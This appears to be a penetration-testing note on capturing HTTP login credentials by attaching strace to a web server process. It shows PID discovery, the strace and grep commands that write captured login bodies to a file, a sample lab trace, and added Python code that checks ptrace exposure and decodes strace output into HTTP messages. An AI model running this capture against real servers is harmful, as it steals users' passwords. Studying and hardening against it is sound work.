Dump HTTP Credentials
This technique is meant for cases where you have strace and an HTTP process and want to intercept the packets to obtain the credentials a user may be entering at a login; it is useful when you are the user that owns the process or when you are root. This works for HTTP or HTTPS.
Identifying the Service PID
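Before relying on this technique, or worrying about it, a defender wants to know whether a given process can be attached to at all. The following added example (not code from the original note) checks the two procfs facts that decide that: TracerPid in /proc/<pid>/status, which is non-zero while a tracer such as strace is attached, and kernel.yama.ptrace_scope, where 0 lets any process with the same uid attach, 1 limits attaching to an ancestor of the tracee, 2 requires CAP_SYS_PTRACE and 3 disables attaching entirely. The function names are this example's own. One caveat the note does not spell out: strace shows the bytes the process exchanges with the kernel, so for HTTPS the plaintext is visible only when the traced process itself speaks plain HTTP, for example behind a TLS-terminating proxy.

```python
"""Check whether a process is exposed to ptrace-based capture (strace).

Added example, not part of the original note. Reads two procfs facts:
  /proc/<pid>/status                 -> TracerPid, non-zero while a tracer is attached
  /proc/sys/kernel/yama/ptrace_scope -> Yama restriction level, absent if Yama is off
The function names below are this example's own.
"""
import os
import re
import sys
from typing import Optional

YAMA_SCOPE_PATH = "/proc/sys/kernel/yama/ptrace_scope"

# Meaning of each Yama level (see Documentation/admin-guide/LSM/Yama.rst).
SCOPE_MEANING = {
    0: "classic: any process with the same uid (or CAP_SYS_PTRACE) may attach",
    1: "restricted: only an ancestor of the tracee (or CAP_SYS_PTRACE) may attach",
    2: "admin-only: only processes with CAP_SYS_PTRACE may attach",
    3: "no attach: PTRACE_ATTACH is disabled for every process",
}


def parse_tracer_pid(status_text: str) -> int:
    """Extract the TracerPid field from the text of /proc/<pid>/status."""
    m = re.search(r"^TracerPid:\s*(\d+)\s*$", status_text, re.MULTILINE)
    if m is None:
        raise ValueError("status text has no TracerPid field")
    return int(m.group(1))


def read_ptrace_scope(path: str = YAMA_SCOPE_PATH) -> Optional[int]:
    """Return the Yama ptrace_scope level, or None when Yama is not present."""
    try:
        with open(path, encoding="ascii") as fh:
            return int(fh.read().strip())
    except FileNotFoundError:
        return None


def assess(status_text: str, scope: Optional[int]) -> dict:
    """Combine TracerPid and the Yama level into a small exposure report.

    A missing Yama (scope None) behaves like level 0: classic ptrace rules.
    """
    tracer = parse_tracer_pid(status_text)
    level = 0 if scope is None else scope
    return {
        "tracer_pid": tracer,
        "traced_now": tracer != 0,
        # an unrelated process running as the same user can attach only at level 0
        "unrelated_same_uid_can_attach": level == 0,
        # root / CAP_SYS_PTRACE can attach at every level except 3
        "root_can_attach": level < 3,
        "scope_meaning": SCOPE_MEANING.get(level, "unknown level %d" % level),
    }


def assess_pid(pid: int) -> dict:
    """Read the live procfs entries for `pid` and assess them (Linux only)."""
    with open(f"/proc/{pid}/status", encoding="utf-8") as fh:
        return assess(fh.read(), read_ptrace_scope())


if __name__ == "__main__":
    # Usage: python3 ptrace_exposure.py [pid]   (defaults to this process)
    target = int(sys.argv[1]) if len(sys.argv) > 1 else os.getpid()
    for key, value in assess_pid(target).items():
        print(f"{key}: {value}")
```

The report maps directly to hardening: on a host where only administrators are expected to debug, set kernel.yama.ptrace_scope to 2 (or 3) with sysctl, and remember that a process can also opt out of being dumpable with prctl(PR_SET_DUMPABLE, 0), which blocks same-uid attaching even at level 0.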
netstat -putona
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 127.0.0.1:43493 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 127.0.0.1:4040 0.0.0.0:* LISTEN 86230/ngrok off (0.00/0/0)
tcp 0 0 127.0.0.1:36023 0.0.0.0:* LISTEN 2904/Code --standar off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp6 0 0 :::3389 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 127.0.0.1:34103 :::* LISTEN 5156/java off (0.00/0/0)
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 5156/java off (0.00/0/0)
tcp6 0 0 ::1:3350 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 2001:1388:13a7:cf:48056 2600:1f1e:4e5:1::6e:443 ESTABLISHED 86230/ngrok keepalive (6.67/0/0)
udp 0 0 192.168.1.41:68 192.168.1.1:67 ESTABLISHED - off (0.00/0/0)
udp 0 0 224.0.0.251:5353 0.0.0.0:* 5358/chrome --disab off (0.00/0/0)
udp6 0 0 fe80::b625:3910:980:546 :::* - off (0.00/0/0)
We can also identify it with ps -aux
root 88312 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/6:2-mm_percpu_wq]
root 88313 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/5:2-rcu_gp]
dsds 88389 0.0 0.1 1186390240 64836 ? Sl Apr10 0:00 /home/dsds/BurpSuitePro/burpbrowser/122.0.6261.111/chrome --type=renderer --crashpad-handler-pid=5361 --enable-crash-reporter=, --user-
root 88502 0.8 0.1 260876 37652 pts/0 Sl+ Apr10 0:55 /home/dsds/ponencias/dragon-jar/api/env/bin/python3 app.py
root 88857 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/11:3-cgroup_destroy]
root 89074 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/8:1-events]
root 89553 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/12:1-cgroup_destroy]
root 89555 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/14:0-mm_percpu_wq]
We can identify the PID, which is 88502.
Dump the process to obtain the requests
strace -e trace=network -s 1024 -fp 88502 2>&1
Identifying the endpoint
# strace -e trace=network -s 1024 -fp 88502 2>&1
strace: Process 88502 attached with 2 threads
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88503] accept4(4, {sa_family=AF_INET, sin_port=htons(56866), sin_addr=inet_addr("192.168.1.41")}, [16], SOCK_CLOEXEC) = 5
[pid 88503] getsockname(5, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.168.1.41")}, [128 => 16]) = 0
strace: Process 165519 attached
[pid 165519] recvfrom(5, "POST /api/login HTTP/1.1\r\nHost: lab-cors.local\r\nContent-Length: 42\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nOrigin: http://lab-cors.local\r\nReferer: http://lab-cors.local/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n{\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"}", 8192, 0, NULL, NULL) = 439
[pid 165519] sendto(5, "HTTP/1.1 401 UNAUTHORIZED\r\nServer: Werkzeug/3.0.2 Python/3.11.2\r\nDate: Thu, 11 Apr 2024 05:40:10 GMT\r\nContent-Type: application/json\r\nContent-Length: 42\r\nConnection: close\r\n\r\n", 175, 0, NULL, 0) = 175
[pid 165519] sendto(5, "{\n \"error\": \"Credenciales incorrectas\"\n}\n", 42, 0, NULL, 0) = 42
[pid 165519] shutdown(5, SHUT_WR) = 0
[pid 165519] +++ exited with 0 +++
We identify the credentials {\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"} and, from that, the endpoint /api/login.
We can also identify this endpoint from a proxy such as Burp Suite.
Then we can adjust the -s parameter so that it shows the full request, if needed.
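To show exactly what the trace above exposes, here is an added example (not code from the original note) that parses strace's network syscalls back into HTTP messages. strace prints each buffer as a C-style string literal (\r\n, \", octal escapes for non-ASCII bytes), so the literal is unescaped first and then split into start line, headers and body; a record is marked complete only when strace did not cut it at the -s limit and the decoded length equals the syscall's return value. TRACE is a shortened, constructed copy of the trace shown above, and the function names are this example's own.

```python
"""Decode the network syscalls in an strace log into HTTP messages.

Added example, not part of the original note. It reconstructs what a tracer
sees: strace prints each buffer as a C-style string literal, so the literal
must be unescaped before the HTTP request line, headers and body can be read.
TRACE is a shortened, constructed copy of the trace on the page.
"""
import json
import re
from typing import Optional

# Constructed sample: a login request and its 401 reply, as strace -e trace=network prints them.
TRACE = r'''strace: Process 88502 attached with 2 threads
[pid 88503] accept4(4, {sa_family=AF_INET, sin_port=htons(56866), sin_addr=inet_addr("192.168.1.41")}, [16], SOCK_CLOEXEC) = 5
[pid 165519] recvfrom(5, "POST /api/login HTTP/1.1\r\nHost: lab-cors.local\r\nContent-Length: 42\r\nContent-Type: application/json\r\nConnection: close\r\n\r\n{\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"}", 8192, 0, NULL, NULL) = 163
[pid 165519] sendto(5, "HTTP/1.1 401 UNAUTHORIZED\r\nServer: Werkzeug/3.0.2 Python/3.11.2\r\nContent-Type: application/json\r\nContent-Length: 42\r\nConnection: close\r\n\r\n", 138, 0, NULL, 0) = 138
[pid 165519] sendto(5, "{\n  \"error\": \"Credenciales incorrectas\"\n}\n", 42, 0, NULL, 0) = 42
[pid 165519] shutdown(5, SHUT_WR) = 0
'''

# One strace line: optional "[pid N]", a buffer syscall, fd, quoted literal,
# optional "..." truncation mark (the -s limit), and the return value.
SYSCALL_RE = re.compile(
    r'^(?:\[pid\s+(?P<pid>\d+)\]\s+)?'
    r'(?P<call>recvfrom|sendto|recv|send|read|write)\((?P<fd>\d+),\s*'
    r'"(?P<lit>(?:[^"\\]|\\.)*)"(?P<trunc>\.\.\.)?'
    r'.*=\s*(?P<ret>-?\d+)\s*$'
)
SIMPLE_ESCAPES = {"n": 10, "r": 13, "t": 9, "a": 7, "b": 8, "f": 12, "v": 11, "\\": 92, '"': 34}
HTTP_START_RE = re.compile(rb"^(?:[A-Z]+ \S+ HTTP/\d\.\d|HTTP/\d\.\d \d{3}[^\r\n]*)\r\n")


def unescape_strace(literal: str) -> bytes:
    """Turn strace's C-style string literal back into the raw bytes it printed."""
    out = bytearray()
    i = 0
    while i < len(literal):
        c = literal[i]
        if c != "\\":
            out += c.encode("latin-1")
            i += 1
            continue
        c = literal[i + 1]
        if c in "01234567":                      # \ooo, up to three octal digits
            j = i + 1
            while j < len(literal) and j < i + 4 and literal[j] in "01234567":
                j += 1
            out.append(int(literal[i + 1:j], 8) & 0xFF)
            i = j
        elif c == "x":                           # \xhh (strace -x style)
            out.append(int(literal[i + 2:i + 4], 16))
            i += 4
        else:
            out.append(SIMPLE_ESCAPES[c])        # unknown escape raises KeyError
            i += 2
    return bytes(out)


def parse_http(raw: bytes) -> Optional[dict]:
    """Split a buffer into start line, headers and body if it begins like HTTP."""
    if not HTTP_START_RE.match(raw):
        return None
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return {"start_line": lines[0], "headers": headers, "body": body}


def messages(trace_text: str) -> list:
    """Return one record per buffer-carrying syscall in the trace."""
    records = []
    for line in trace_text.splitlines():
        m = SYSCALL_RE.match(line)
        if m is None:
            continue
        payload = unescape_strace(m.group("lit"))
        ret = int(m.group("ret"))
        records.append({
            "pid": int(m.group("pid")) if m.group("pid") else None,
            "call": m.group("call"),
            "direction": "in" if m.group("call") in ("recvfrom", "recv", "read") else "out",
            "fd": int(m.group("fd")),
            "ret": ret,
            # complete only if strace did not cut the literal and the length matches
            "complete": m.group("trunc") is None and len(payload) == ret,
            "payload": payload,
            "http": parse_http(payload),
        })
    return records


def body_json(record: dict) -> Optional[dict]:
    """Decode a JSON body from a parsed HTTP record, or None if absent or invalid."""
    http = record["http"]
    if http is None or not http["body"]:
        return None
    try:
        return json.loads(http["body"])
    except ValueError:
        return None


if __name__ == "__main__":
    for r in messages(TRACE):
        http = r["http"]
        print(r["direction"], r["call"], r["ret"], http["start_line"] if http else "(body chunk)")
```

The completeness flag is what tells you whether raising -s, as the note suggests, is actually needed; a review tool that audits trace output for sensitive bodies would use the same decoding and then report the field names rather than the values.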
Refining the command
We can narrow the command down to the exact endpoint:
strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login

Or we can also store this in a file:
(strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login) > credentials.txt